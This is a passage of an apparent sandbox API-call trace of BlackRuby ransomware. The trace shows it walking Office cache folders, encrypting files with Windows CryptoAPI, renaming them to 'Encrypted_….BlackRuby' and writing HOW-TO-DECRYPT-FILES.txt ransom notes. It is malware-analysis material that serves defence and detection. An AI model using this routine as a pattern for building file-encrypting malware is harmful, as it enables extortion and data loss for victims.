returned 1 [0047.083] GetLastError () returned 0xb7 [0047.083] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0047.083] GetLastError () returned 0xb7 [0047.083] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Encrypted_ynM3brFS0WENXZwmaJe4RcQKftUhBhZezkqTOcB2yD69uC.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Encrypted_ynM3brFS0WENXZwmaJe4RcQKftUhBhZezkqTOcB2yD69uC.BlackRuby", lpFilePart=0x0) returned 0x81 [0047.083] GetLastError () returned 0xb7 [0047.083] SetErrorMode (uMode=0x1) returned 0x0 [0047.083] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x24432720, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x440)) returned 1 [0047.084] GetLastError () returned 0xb7 [0047.084] SetErrorMode (uMode=0x0) returned 0x1 [0047.084] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Encrypted_ynM3brFS0WENXZwmaJe4RcQKftUhBhZezkqTOcB2yD69uC.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\encrypted_ynm3brfs0wenxzwmaje4rcqkftuhbhzezkqtocb2yd69uc.blackruby")) returned 1 [0047.084] GetLastError () returned 0xb7 [0047.084] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.084] GetLastError () returned 0xb7 [0047.084] SetErrorMode (uMode=0x1) returned 0x0 [0047.084] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.084] GetLastError () returned 0x5 [0047.085] SetErrorMode (uMode=0x0) returned 0x1 [0047.085] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.085] GetLastError () returned 0x5 [0047.086] SetErrorMode (uMode=0x1) returned 0x0 [0047.086] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1ba70d8 | out: lpFileInformation=0x1ba70d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3bd29620, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xa40)) returned 1 [0047.086] GetLastError () returned 0x5 [0047.086] SetErrorMode (uMode=0x0) returned 0x1 [0047.086] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.086] GetLastError () returned 0x5 [0047.086] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.086] GetLastError () returned 0x5 [0047.086] SetErrorMode (uMode=0x1) returned 0x0 [0047.086] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.086] GetLastError () returned 0x0 [0047.086] GetFileType (hFile=0x184) returned 0x1 [0047.086] SetErrorMode (uMode=0x0) returned 0x1 [0047.086] GetFileType (hFile=0x184) returned 0x1 [0047.087] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xa40 [0047.087] GetLastError () returned 0x0 [0047.087] ReadFile (in: hFile=0x184, lpBuffer=0x1ba9930, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ba9930*, lpNumberOfBytesRead=0x18ed84*=0xa40, lpOverlapped=0x0) returned 1 [0047.103] GetLastError () returned 0x0 [0047.104] CloseHandle (hObject=0x184) returned 1 [0047.104] GetLastError () returned 0x0 [0047.104] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.104] GetLastError () returned 0x0 [0047.104] SetErrorMode (uMode=0x1) returned 0x0 [0047.104] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3bd29620, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xa40)) returned 1 [0047.104] GetLastError () returned 0x0 [0047.104] SetErrorMode (uMode=0x0) returned 0x1 [0047.104] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0047.104] GetLastError () returned 0x0 [0047.139] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c05748, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ae0) returned 1 [0047.139] GetLastError () returned 0x0 [0047.139] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.139] GetLastError () returned 0x0 [0047.144] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.144] GetLastError () returned 0x0 [0047.144] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f60) returned 1 [0047.144] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.144] GetLastError () returned 0x0 [0047.144] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1c32794*=0x1, dwFlags=0x0) returned 1 [0047.144] GetLastError () returned 0x0 [0047.144] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1c32760, dwFlags=0x0) returned 1 [0047.144] GetLastError () returned 0x0 [0047.144] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c327dc*, pdwDataLen=0x18ed74*=0xb40, dwBufLen=0xb40 | out: pbData=0x1c327dc*, pdwDataLen=0x18ed74*=0xb40) returned 1 [0047.144] GetLastError () returned 0x0 [0047.144] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c33e88*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c33e88*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.144] GetLastError () returned 0x0 [0047.144] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c33eb8*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c33eb8*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.144] GetLastError () returned 0x0 [0047.144] CryptDestroyKey (hKey=0x360ae0) returned 1 [0047.144] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0047.144] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0047.144] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.144] GetLastError () returned 0x0 [0047.144] SetErrorMode (uMode=0x1) returned 0x0 [0047.144] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.145] GetLastError () returned 0xb7 [0047.145] GetFileType (hFile=0x184) returned 0x1 [0047.145] SetErrorMode (uMode=0x0) returned 0x1 [0047.145] GetFileType (hFile=0x184) returned 0x1 [0047.147] CloseHandle (hObject=0x184) returned 1 [0047.147] GetLastError () returned 0xb7 [0047.147] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.148] GetLastError () returned 0xb7 [0047.148] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Encrypted_08b3meM91Cd1nxeq2zeHe76PXCuo7ataYPXpeEO.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Encrypted_08b3meM91Cd1nxeq2zeHe76PXCuo7ataYPXpeEO.BlackRuby", lpFilePart=0x0) returned 0x7a [0047.148] GetLastError () returned 0xb7 [0047.148] SetErrorMode (uMode=0x1) returned 0x0 [0047.148] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x244f0e00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xb50)) returned 1 [0047.148] GetLastError () returned 0xb7 [0047.148] SetErrorMode (uMode=0x0) returned 0x1 [0047.148] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Encrypted_08b3meM91Cd1nxeq2zeHe76PXCuo7ataYPXpeEO.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\encrypted_08b3mem91cd1nxeq2zehe76pxcuo7ataypxpeeo.blackruby")) returned 1 [0047.148] GetLastError () returned 0xb7 [0047.149] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.149] GetLastError () returned 0xb7 [0047.149] SetErrorMode (uMode=0x1) returned 0x0 [0047.149] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.149] GetLastError () returned 0x5 [0047.150] SetErrorMode (uMode=0x0) returned 0x1 [0047.150] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us", lpFilePart=0x0) returned 0x4b [0047.150] GetLastError () returned 0x5 [0047.150] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.150] GetLastError () returned 0x5 [0047.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.150] GetLastError () returned 0x5 [0047.150] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us", lpFilePart=0x0) returned 0x4b [0047.150] GetLastError () returned 0x5 [0047.150] SetErrorMode (uMode=0x1) returned 0x0 [0047.150] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0047.161] GetLastError () returned 0x5 [0047.161] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.161] GetLastError () returned 0x5 [0047.161] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.161] GetLastError () returned 0x5 [0047.161] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.161] GetLastError () returned 0x5 [0047.161] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.161] GetLastError () returned 0x5 [0047.161] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.161] GetLastError () returned 0x5 [0047.161] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.161] GetLastError () returned 0x12 [0047.161] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0047.162] SetErrorMode (uMode=0x0) returned 0x1 [0047.162] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us", lpFilePart=0x0) returned 0x4b [0047.162] GetLastError () returned 0x12 [0047.162] SetErrorMode (uMode=0x1) returned 0x0 [0047.162] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0047.163] GetLastError () returned 0x12 [0047.163] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.163] GetLastError () returned 0x12 [0047.163] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.163] GetLastError () returned 0x12 [0047.163] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.163] GetLastError () returned 0x12 [0047.163] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.163] GetLastError () returned 0x12 [0047.163] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.163] GetLastError () returned 0x12 [0047.163] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.163] GetLastError () returned 0x12 [0047.163] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0047.164] SetErrorMode (uMode=0x0) returned 0x1 [0047.164] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", lpFilePart=0x0) returned 0x59 [0047.164] GetLastError () returned 0x12 [0047.164] SetErrorMode (uMode=0x1) returned 0x0 [0047.164] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x1c561c4 | out: lpFileInformation=0x1c561c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20354600, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x20354600, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3b0cfc30, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1bac00)) returned 1 [0047.165] GetLastError () returned 0x12 [0047.165] SetErrorMode (uMode=0x0) returned 0x1 [0047.166] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x64 [0047.166] GetLastError () returned 0x12 [0047.166] SetErrorMode (uMode=0x1) returned 0x0 [0047.166] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.166] GetLastError () returned 0x0 [0047.166] GetFileType (hFile=0x184) returned 0x1 [0047.166] SetErrorMode (uMode=0x0) returned 0x1 [0047.166] GetFileType (hFile=0x184) returned 0x1 [0047.166] WriteFile (in: hFile=0x184, lpBuffer=0x1c71bec*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1c71bec*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0047.167] GetLastError () returned 0x0 [0047.167] CloseHandle (hObject=0x184) returned 1 [0047.167] GetLastError () returned 0x0 [0047.167] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x64 [0047.167] GetLastError () returned 0x0 [0047.167] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0047.167] GetLastError () returned 0x0 [0047.167] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0047.167] GetLastError () returned 0x0 [0047.167] SetErrorMode (uMode=0x1) returned 0x0 [0047.167] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c73930 | out: lpFileInformation=0x1c73930*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3b0cfc30, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x545)) returned 1 [0047.168] GetLastError () returned 0x0 [0047.168] SetErrorMode (uMode=0x0) returned 0x1 [0047.168] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0047.168] GetLastError () returned 0x0 [0047.168] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0047.168] GetLastError () returned 0x0 [0047.168] SetErrorMode (uMode=0x1) returned 0x0 [0047.168] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.168] GetLastError () returned 0x0 [0047.168] GetFileType (hFile=0x184) returned 0x1 [0047.168] SetErrorMode (uMode=0x0) returned 0x1 [0047.168] GetFileType (hFile=0x184) returned 0x1 [0047.168] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x545 [0047.168] GetLastError () returned 0x0 [0047.168] ReadFile (in: hFile=0x184, lpBuffer=0x1c75a10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c75a10*, lpNumberOfBytesRead=0x18ed18*=0x545, lpOverlapped=0x0) returned 1 [0047.173] GetLastError () returned 0x0 [0047.173] CloseHandle (hObject=0x184) returned 1 [0047.173] GetLastError () returned 0x0 [0047.173] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpFilePart=0x0) returned 0x59 [0047.173] GetLastError () returned 0x0 [0047.173] SetErrorMode (uMode=0x1) returned 0x0 [0047.173] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3b0cfc30, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x545)) returned 1 [0047.173] GetLastError () returned 0x0 [0047.173] SetErrorMode (uMode=0x0) returned 0x1 [0047.173] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c680) returned 1 